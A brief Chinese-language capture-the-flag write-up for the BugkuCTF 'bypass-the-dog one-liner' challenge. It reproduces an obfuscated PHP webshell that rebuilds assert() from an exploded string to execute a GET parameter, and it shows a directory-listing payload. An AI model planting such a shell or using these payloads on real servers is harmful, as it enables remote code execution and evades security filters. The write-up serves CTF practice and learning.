BugkuCTF 过狗一句话

点开链接没有任何内容，源代码也是

后台扫描也无果
回到提示

 
	$poc="a#s#s#e#r#t"; 
	$poc_1=explode("#",$poc); 
	$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; 
	$poc_2($_GET['s']) 
?>

explode() 函数把字符串打散为数组

	$poc="a#s#s#e#r#t"; 
	$poc_1=explode("#",$poc); 
	print_r($poc_1);
?>
运行结果：
Array([0] => a	[1] => s	[2] => s	[3] => e	[4] => r	[5] => t)

最后得到的就是 assert($_GET[‘s’])

类似于 eval($_POST[‘s’])的一句话木马
即可以用s来执行命令 扫下目录 ?s=print_r(scandir(’./’))

还是没有找到文件 去看了下别人的wp 发现到这一步就可以出flag了 可能是出题人删了吧